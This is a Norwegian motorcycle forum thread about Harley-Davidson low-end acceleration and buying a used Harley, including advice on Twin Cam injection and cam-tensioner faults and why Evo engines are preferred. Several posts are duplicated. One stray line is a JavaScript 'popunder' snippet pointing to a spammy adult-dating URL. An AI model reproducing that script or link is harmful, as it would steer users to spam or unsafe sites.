Let me rephrase..... Jeg får ikke til å svi gummi, altså type først ut av lyskrysset....... Blokker man framhjulet, så blir det jo noe annet....
"Low end" Harely
Re: "Low end" Harely
Re: "Low end" Harely
Skjønner hva du mener, men litt vrient det der, uten turteller.....
Re: "Low end" Harely
Hehe skjønner jeg godt! Har kjørt flere hd sykler og vet hva motorene er gode for
Re: "Low end" Harely
Pffffffftt......
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
I never apologize.
I'm sorry, but that's just the way I am.
I'm sorry, but that's just the way I am.
Re: "Low end" Harely
Legende! Vtwin tar jo rekkefirer fra 0-60(?) som oftest
-
- Innlegg: 7613
- Registrert: 06 nov 2008, 22:42
- Motorsykkelen din: flere -til div kjøring.
- Sted: Tranby
Re: "Low end" Harely
på de få meterne før skjeggapen skjener mot venstre så er han nok kjappere enn han som ikke klarer en launch med RR ja..
finner ikke mange andre slike filmer dog...
kjørt noe HD og Big Dog selv også og akkurat aks og effekt har ikke akkurat imponert...
Går ikke "dårlig" men heller ikke noe opphissende..
skal du ha noe som akser skikkelig 0-60 så er det scooter som gjelder.
finner ikke mange andre slike filmer dog...
kjørt noe HD og Big Dog selv også og akkurat aks og effekt har ikke akkurat imponert...
Går ikke "dårlig" men heller ikke noe opphissende..
skal du ha noe som akser skikkelig 0-60 så er det scooter som gjelder.
当有疑问时踢你的敌人在生殖器上,你可以道歉后
Re: "Low end" Harely
Ikke elbil?
-
OnlineBjerknez
- Innlegg: 23040
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: "Low end" Harely
Hadde vert morsommere hvis Hildo og han andre hadde økt distansen med 100 meter (eller mer). Da hadde nok den sure Harleyen havnet i bakevja. Eller EN runde på bane. Jeg tipper Harleyen til Hildo hadde brent opp før runden var over.mekkern skrev: ↑06 des 2018, 15:37 på de få meterne før skjeggapen skjener mot venstre så er han nok kjappere enn han som ikke klarer en launch med RR ja..
finner ikke mange andre slike filmer dog...
kjørt noe HD og Big Dog selv også og akkurat aks og effekt har ikke akkurat imponert...
Går ikke "dårlig" men heller ikke noe opphissende..
skal du ha noe som akser skikkelig 0-60 så er det scooter som gjelder.
Men så klart, fra 0-60 (eller der omkring) er det lite som skiller uansett kjøretøy tror jeg.
Re: "Low end" Harely
Nja... jeg kan LOVE deg at min gamle Hyundai Getz (en forferdelig bil) hadde kommet etter det meste.
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
-
OnlineBjerknez
- Innlegg: 23040
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: "Low end" Harely
men hyundai Getz er ikke et kjøretøy
Re: "Low end" Harely
Tja... den tar deg fra A til B med en ølkasse og en bærepose eller tre, men det er omtrent det.
Spøk til side, bilen er helt OK. Ikke spesielt god å kjøre langt men liten og relativt praktisk i byen. Og billig...
2019 KTM 790 Adventure
2008 KTM Duke 690
2008 KTM Duke 690
-
OnlineBjerknez
- Innlegg: 23040
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: "Low end" Harely
Så klart vil en Getz tape mot en Formel1 bil fra 0-60. Jeg snakker veldig generelt her hvor man sammenligner mer eller mindre like kjøretøy.
Re: "Low end" Harely
Skal prøve å ro meg litt mot "topic" igjen.
Sportster er ikke en dum sykkel, i alle fall i Sportster 1200! 883, kan bli litt daff.
Har en kompis med Sportster 1200 som kjører rundt 20k + i året og kjører mange lange turer, så det er en rimelig kapabel tursykkel.
Meeeeeeen, jeg ser du kjører Duke, og om den passer deg, så blir nok Sportster litt liten!
Så da havner jeg omtrent på Jompa's anbefaling. Se etter en Softail eller Dyna.
Softail har MYE dårlige nedleggsvinkel enn Dyna, og den egner ikke veldig bra til å kjøre lange distanser med passasjer på!
Stivramme-look'en er kul, men fjæringen og bakkeklaringen er ikke super!
HD er vel det merket (sammen med Ducati?) som har flest posører, så det fins massvis av Harley'er på bruktmarkedet som er vaska oftere enn de er kjørt!
En annen ting å passe på når det kommer til bruktkjøp av HD er om sykkelen er skrudd ihjel eller ikke!
HD er bare marginalt mer teknisk avansert enn en H-bjelke (ligger vel midt mellom det og LEGO® Technic), derfor tror alt for mange tullinger at de kan skru på dem selv.... selv om de har et tosifret antall tomler!
Så om eier har skrudd sjøl, så sjekk om han/hun/hen har momentnøkler og vet hvordan de brukes!!
Har vært borti HD der skruer som skal settes til med mellom 10 -15 Nm har vært dratt til så jævlig at de ikke nesten ikke lot seg løsne med en latmannsarm på 60cm!! HD rister vettu, så da drar man til litt ekstra!!
Sportster er ikke en dum sykkel, i alle fall i Sportster 1200! 883, kan bli litt daff.
Har en kompis med Sportster 1200 som kjører rundt 20k + i året og kjører mange lange turer, så det er en rimelig kapabel tursykkel.
Meeeeeeen, jeg ser du kjører Duke, og om den passer deg, så blir nok Sportster litt liten!
Så da havner jeg omtrent på Jompa's anbefaling. Se etter en Softail eller Dyna.
Softail har MYE dårlige nedleggsvinkel enn Dyna, og den egner ikke veldig bra til å kjøre lange distanser med passasjer på!
Stivramme-look'en er kul, men fjæringen og bakkeklaringen er ikke super!
HD er vel det merket (sammen med Ducati?) som har flest posører, så det fins massvis av Harley'er på bruktmarkedet som er vaska oftere enn de er kjørt!
En annen ting å passe på når det kommer til bruktkjøp av HD er om sykkelen er skrudd ihjel eller ikke!
HD er bare marginalt mer teknisk avansert enn en H-bjelke (ligger vel midt mellom det og LEGO® Technic), derfor tror alt for mange tullinger at de kan skru på dem selv.... selv om de har et tosifret antall tomler!
Så om eier har skrudd sjøl, så sjekk om han/hun/hen har momentnøkler og vet hvordan de brukes!!
Har vært borti HD der skruer som skal settes til med mellom 10 -15 Nm har vært dratt til så jævlig at de ikke nesten ikke lot seg løsne med en latmannsarm på 60cm!! HD rister vettu, så da drar man til litt ekstra!!
I never apologize.
I'm sorry, but that's just the way I am.
I'm sorry, but that's just the way I am.
Re: "Low end" Harely
Problemet med HD Big Twin i denne sammenhengen, er prisnivået.
De fleste store HD'er til rundt 150k er twin-cam rundt 2000 modeller. Og de aller fleste av disse har et par ganske alvorlige mangelsykdommer. De første TC'er, fra ca -99, kom med Magneti Marelli injection, uten O2 sensorer. Masse trøbbel med MM, så det bør man styre unna, med mindre de er bygget om til forgasser. Noen få fra denne perioden er levert med forgasser originalt.
Fra 2002 kom de med et nytt injection system, Delphi I. Dette funka bedre, men heller ikke uproblematisk. I tillegg har alle disse tidlige TC-motorene problemer med at materialet i kamkjede-strammeren kan løse seg opp, og små biter av dette materialet kan skape problemer i oljepumpa, og så har man det gående.
Det er litt varierende opplysninger om når HD fikk orden på disse tingene, men de fleste ser ut til å mene at fra 2006 var det meste i orden. Da brukes et forbedret injection-system, Delphi II, og kamkjede-strammeren er også forbedret.
Skal man ha TC, så bør den være 2002 eller nyere. Det kan man finne for 150k. Men da bør man også ta høyde for en oppgradering hvor man bytter ut kamkjedet med drev. Og om man ikke skrur selv, så ser man på et verkstedbesøk til mellom 15-20k.
Personlig tenker jeg at om man skal ha en never-click stor HD, til en vettug pris, så er det trygt og godt med en eldre sak. Evo-motor fra 90-tallet. Direktedrev, ikke noe kamkjede, forgasser, null injectionproblemer. Og forøvrig også nesten fri for elektronikk. Det store flertall av HD-folk i junaiten mener bestemt at Evo er den beste motoren HD noensinne har levert.
Man kan finne strøkne Evo HD'er fra siste halvdel av nittitallet til i underkant av 100k. Med litt kvassere kammer, en ny forgasser eller evt dyse om den originale, så får man lett en sprek Evo med 70-80 hk, som fort vekk er sprekere og mye mer pålitelig enn en tidlig TC. Og til en langt lavere pris.
De fleste store HD'er til rundt 150k er twin-cam rundt 2000 modeller. Og de aller fleste av disse har et par ganske alvorlige mangelsykdommer. De første TC'er, fra ca -99, kom med Magneti Marelli injection, uten O2 sensorer. Masse trøbbel med MM, så det bør man styre unna, med mindre de er bygget om til forgasser. Noen få fra denne perioden er levert med forgasser originalt.
Fra 2002 kom de med et nytt injection system, Delphi I. Dette funka bedre, men heller ikke uproblematisk. I tillegg har alle disse tidlige TC-motorene problemer med at materialet i kamkjede-strammeren kan løse seg opp, og små biter av dette materialet kan skape problemer i oljepumpa, og så har man det gående.
Det er litt varierende opplysninger om når HD fikk orden på disse tingene, men de fleste ser ut til å mene at fra 2006 var det meste i orden. Da brukes et forbedret injection-system, Delphi II, og kamkjede-strammeren er også forbedret.
Skal man ha TC, så bør den være 2002 eller nyere. Det kan man finne for 150k. Men da bør man også ta høyde for en oppgradering hvor man bytter ut kamkjedet med drev. Og om man ikke skrur selv, så ser man på et verkstedbesøk til mellom 15-20k.
Personlig tenker jeg at om man skal ha en never-click stor HD, til en vettug pris, så er det trygt og godt med en eldre sak. Evo-motor fra 90-tallet. Direktedrev, ikke noe kamkjede, forgasser, null injectionproblemer. Og forøvrig også nesten fri for elektronikk. Det store flertall av HD-folk i junaiten mener bestemt at Evo er den beste motoren HD noensinne har levert.
Man kan finne strøkne Evo HD'er fra siste halvdel av nittitallet til i underkant av 100k. Med litt kvassere kammer, en ny forgasser eller evt dyse om den originale, så får man lett en sprek Evo med 70-80 hk, som fort vekk er sprekere og mye mer pålitelig enn en tidlig TC. Og til en langt lavere pris.